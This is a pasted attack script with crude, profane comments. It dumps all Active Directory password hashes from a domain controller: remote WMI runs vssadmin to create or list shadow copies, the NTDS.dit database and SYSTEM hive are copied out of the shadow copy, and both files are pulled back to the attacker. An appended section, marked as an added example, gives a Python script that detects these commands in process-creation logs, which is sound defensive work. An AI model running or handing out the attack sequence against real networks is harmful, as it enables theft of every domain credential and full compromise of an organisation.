Untitled

a guest
Jul 25th, 2014
# mostly entirely stolen from http://www.room362.com/blog/2013/06/10/volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/
# IIGHT UP IN THIS SHIT
# WE GONNA YANK OUT SOME MUTHAFUNKIN HASHES N SHIT (liek all of AD amirite)
# REPLACE ALL DIS SHIT WIT YO SHIT

# TARGETDC
# DOMAIN
# USER
# PASSWORD

# FIND AND REPLACE ALL BITCH

net use \\TARGETDC /user:DOMAIN\USER PASSWORD

wmic /node:"TARGETDC" /user:"DOMAIN\USER" /password:"PASSWORD" process call create "cmd /c vssadmin list shadows > C:\reboot.s246672.log 2>&1"

type \\TARGETDC\C$\reboot.s246672.log

# LOOK AT THAT OUTPUT
# IF THERE ARE SHADOW COPIES
# LOOK FOR THE ONE FOR DRIVE C
# YOU WILL SEE SOME SHIT LIKE "HarddiskVolumeShadowCopy10"
# THE NUMBER AT THE END WILL BE DIFFERENT
# REMEMBER THAT FUCKING NUMBER
# FUCK

# IF THERE ARE NO SHADOW COPIES
# keep fuckin' truckin'

# IF SHADOW COPIES EXIST GOTO FUCKING_SHIT_NIKKCKELS
# MAKE SOME FUCKING SHADOWS
# ONLY PROPER SERVERS CAN RUN VSSADMIN CREATE SHADOW
wmic /node:"TARGETDC" /user:"DOMAIN\USER" /password:"PASSWORD" process call create "cmd /c vssadmin create shadow /for=C: > C:\shutdown.s57345.log 2>&1"
type \\TARGETDC\C$\shutdown.s57345.log

wmic /node:"TARGETDC" /user:"DOMAIN\USER" /password:"PASSWORD" process call create "cmd /c vssadmin list shadows > C:\reboot.s246672.log 2>&1"
type \\TARGETDC\C$\reboot.s246672.log

# LOOK FOR THE ONE FOR DRIVE C
# YOU WILL SEE SOME SHIT LIKE "HarddiskVolumeShadowCopy10" SOMEWHERE
# THE NUMBER AT THE END WILL BE DIFFERENT
# REMEMBER THAT FUCKING NUMBER
# FUCK

# FUCKING_SHIT_NIKKCKELS
# DONT JUST FUCKING RUN THIS COMMAND YOU EAGER FUCK
# REMEMBER THAT FUCKING NUMBER?
# NOW YOU FUCKING NEED IT
# CHANGE HarddiskVolumeShadowCopy10 TO WHATEVER THE FUCK IT WAS
wmic /node:"TARGETDC" /user:"DOMAIN\USER" /password:"PASSWORD" process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy10\Windows\System32\config\SYSTEM C:\SYSTEM.hive > C:\update.36234211.log 2>&1"

# PAY THE FUCK ATTENTION AND CHANGE "HarddiskVolumeShadowCopy10" FOR THIS COMMAND TOO
# FUCK
wmic /node:"TARGETDC" /user:"DOMAIN\USER" /password:"PASSWORD" process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy10\Windows\NTDS\NTDS.dit C:\NTDS.dit > C:\update.4352.log 2>&1"

# NOW STEAL DAT SHIT MOFUCKA
xcopy \\TARGETDC\C$\SYSTEM.hive .\
xcopy \\TARGETDC\C$\NTDS.dit .\

# NOW CLEAN UP YOUR GODDAMN MESS YOU FILTHY MOFUCKA
# OR NOT
# FUCK YOU
# DELETE YOUR SHADOW COPY IF YOU WANT
# FUCKING FREE BACKUPS BITCH
# I DONT GIVE A FUCK

del \\TARGETDC\C$\SYSTEM.hive
del \\TARGETDC\C$\NTDS.dit

# ENJOI
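
Commands started with `wmic ... process call create` run on the DC as children of WmiPrvSE.exe, so the sequence above is visible in process-creation logging. The following Python triage is an added example, not part of the original paste: it matches those command lines, and the record fields `host`, `parent` and `cmdline`, the host names and the sample events are constructed assumptions to be mapped onto your own process-creation telemetry.

```python
import re
from collections import defaultdict

# Command-line fragments taken from the paste above, matched case-insensitively.
RULES = {
    "vss_list": re.compile(r"vssadmin(?:\.exe)?\s+list\s+shadows", re.I),
    "vss_create": re.compile(r"vssadmin(?:\.exe)?\s+create\s+shadow", re.I),
    "copy_ntds": re.compile(
        r"HarddiskVolumeShadowCopy\d+\\Windows\\NTDS\\NTDS\.dit", re.I),
    "copy_system": re.compile(
        r"HarddiskVolumeShadowCopy\d+\\Windows\\System32\\config\\SYSTEM(?!\S)", re.I),
}
COPIES = {"copy_ntds", "copy_system"}

def hits(event):
    """Names of the rules matched by one process-creation record."""
    return {name for name, rx in RULES.items() if rx.search(event["cmdline"])}

def triage(events):
    """Map host -> severity. Copies of NTDS.dit or the SYSTEM hive out of a shadow
    copy always count; plain vssadmin use counts only when spawned by WmiPrvSE.exe
    (remote WMI), since administrators also run it locally."""
    seen = defaultdict(set)
    for ev in events:
        matched = hits(ev)
        via_wmi = ev["parent"].lower().endswith("wmiprvse.exe")
        if matched & COPIES or (matched and via_wmi):
            seen[ev["host"]] |= matched
    # Both files together are what offline hash extraction needs: highest severity.
    return {h: "high" if COPIES <= m else "medium" for h, m in seen.items()}

WMI = r"C:\Windows\System32\wbem\WmiPrvSE.exe"
SHADOW = r"\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy10\Windows"
# Constructed sample records (hypothetical hosts; field names are assumptions).
SAMPLE = [
    {"host": "DC01", "parent": WMI, "cmdline": "cmd /c vssadmin list shadows"},
    {"host": "DC01", "parent": WMI,
     "cmdline": "cmd /c copy " + SHADOW + r"\System32\config\SYSTEM C:\SYSTEM.hive"},
    {"host": "DC01", "parent": WMI,
     "cmdline": "cmd /c copy " + SHADOW + r"\NTDS\NTDS.dit C:\NTDS.dit"},
    {"host": "FS02", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "vssadmin list shadows"},
    {"host": "FS03", "parent": WMI, "cmdline": "cmd /c vssadmin create shadow /for=C:"},
]

if __name__ == "__main__":
    print(triage(SAMPLE))
```
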